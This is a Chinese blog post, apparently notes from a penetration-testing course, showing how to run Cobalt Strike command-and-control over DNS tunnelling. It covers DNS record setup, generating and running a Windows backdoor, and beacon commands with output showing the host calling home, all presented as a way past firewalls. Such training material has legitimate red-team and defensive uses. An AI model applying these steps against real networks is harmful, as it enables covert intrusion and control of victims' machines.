<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">1.云主机Teamserver配置端口53启用-udp</span><br><span class="line"> </span><br><span class="line">2.买一个域名修改解析记录如下：</span><br><span class="line">A记录-&gt;cs主机名-&gt;CS服务器IP</span><br><span class="line">NS记录-&gt;ns1主机名-&gt;上个A记录地址</span><br><span class="line">NS记录-&gt;ns2主机名-&gt;上个A记录地址</span><br><span class="line"> </span><br><span class="line">3.配置DNS监听器内容如下：</span><br><span class="line">ns1.xiaodi8.com</span><br><span class="line">ns2.xiaodi8.com</span><br><span class="line">cs.xiaodi8.com</span><br><span class="line"> </span><br><span class="line">4.生成后门执行上线后启用命令：</span><br><span class="line">beacon&gt; checkin</span><br><span class="line">[] Tasked beacon to checkin</span><br><span class="line">beacon&gt; mode dns-txt</span><br><span class="line">[+] data channel set to DNS-TXT</span><br><span class="line">[+] host called home, sent: 8 bytes</span><br><span class="line">beacon&gt; shell whoami</span><br><span class="line">[] Tasked beacon to run: whoami</span><br><span class="line">[+] host called home, sent: 53 bytes</span><br><span class="line">[+] received output:</span><br><span class="line">xiaodi-pc\xiaodi</span><br></pre></td></tr></table></figure>

<p>应用层是在实战中经常用到的，之前两个层面会经常被防火墙拦截（网络&#x2F;传输层），下面用DNS隧道来实现 cs上线。</p>
<p>cs的监听器对应着后门绑定的协议。常规是用http上线，dns比http速度要慢。当常见协议监听器被拦截时，可以换其他协议上线，其中dns协议上线基本通杀。因为dns是域名解析，这个协议一般都不会被拦截，数据通过dns协议给出去，一般也不会被拦截！</p>
<p>我们在生成监听器的时候有个payload，可以选择不同的协议。网上还有插件，还可以有很多其他协议。</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173138450-2019729909.png" alt="img"></p>
<p>案例演示</p>
<p>&lt;1&gt;云主机Teamserver配置端口53启用-udp（只有阿里云主机有这个端口问题，其他主机一般没有）</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173153913-1629740803.png" alt="img"></p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173202625-507389581.png" alt="img"></p>
<p>&lt;2&gt;买一个域名修改解析记录如下：</p>
<ul>
<li>A记录-&gt;cs主机名-&gt;CS服务器IP</li>
<li>NS记录-&gt;ns1主机名-&gt;上个A记录地址</li>
<li>NS记录-&gt;ns2主机名-&gt;上个A记录地址</li>
</ul>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173214204-1304042333.png" alt="img"></p>
<p>&lt;3&gt;配置DNS监听器内容如下：ns1.xiaodi8.com、ns2.xiaodi8.com、cs.xiaodi8.com</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173227662-1358478727.png" alt="img"></p>
<p>&lt;4&gt;配置完之后，启动监听器，如下</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173237826-1427939803.png" alt="img"></p>
<p>&lt;5&gt;生成后门，attacks–&gt;packages–&gt;windows executable(s)–&gt;listener选择dns上线，勾选–&gt;选择后门生成位置–&gt;生成后门（dns_x.exe）</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173248613-398345226.png" alt="img"></p>
<p>&lt;6&gt;将后门上传到webserver，执行。执行后门后，cs出现一个黑窗口。</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173302000-1427355745.png" alt="img"></p>
<p>&lt;7&gt;点击小图标，出现unknown主机，原因是我们使用DNS上线，DNS速度特别慢。此时我们需要再敲几条命令才能实现控制。</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173321015-486484231.png" alt="img"></p>
<p>&lt;8&gt;右击unknown主机，选择interact，启用命令。执行以下命令，等待一会儿就会上线成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; checkin</span><br><span class="line">beacon&gt; mode dns-txt</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173346897-1959723869.png" alt="img"></p>
<p>一直没有成功，换本机测试，上线成功</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173402434-1535599187.png" alt="img"></p>
<p>等待了许久，终于上线成功。图标上有闪电，说明对应的阿里云主机上存在一些防护措施。</p>
<p><img src="https://img2020.cnblogs.com/blog/1375459/202110/1375459-20211008173415146-453897177.png" alt="img"></p>
<p>隧道技术其实就是不断变换协议，走不同协议来实现数据通信！！！</p>

    </div>

    
    
    
	
        <div class="reward-container">
  <div>原创技术分享，您的支持将鼓励我继续创作</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="HVVL404 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="HVVL404 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>HVVL404
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/71-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E7%BD%91%E7%BB%9C&%E4%BC%A0%E8%BE%93&%E5%BA%94%E7%94%A8%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/" title="71-内网安全-域横向网络&amp;传输&amp;应用层隧道技术">http://example.com/2023/05/04/小迪安全（内网篇）/71-内网安全-域横向网络&传输&应用层隧道技术/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/69-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91CobaltStrike&SPN&RDP/" rel="prev" title="69-内网安全-域横向CobaltStrike&SPN&RDP">
      <i class="fa fa-chevron-left"></i> 69-内网安全-域横向CobaltStrike&SPN&RDP
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/72-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91CS&MSF%E8%81%94%E5%8A%A8%E5%8F%8A%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E5%88%9D%E8%AF%86/" rel="next" title="72-内网安全-域横向CS&MSF联动">
      72-内网安全-域横向CS&MSF联动 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="HVVL404"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">HVVL404</p>
  <div class="site-description" itemprop="description">欢迎来到我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/HVVL404" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;HVVL404" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2023-04 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HVVL404</span>
</div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共79.8k字</span>
</div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
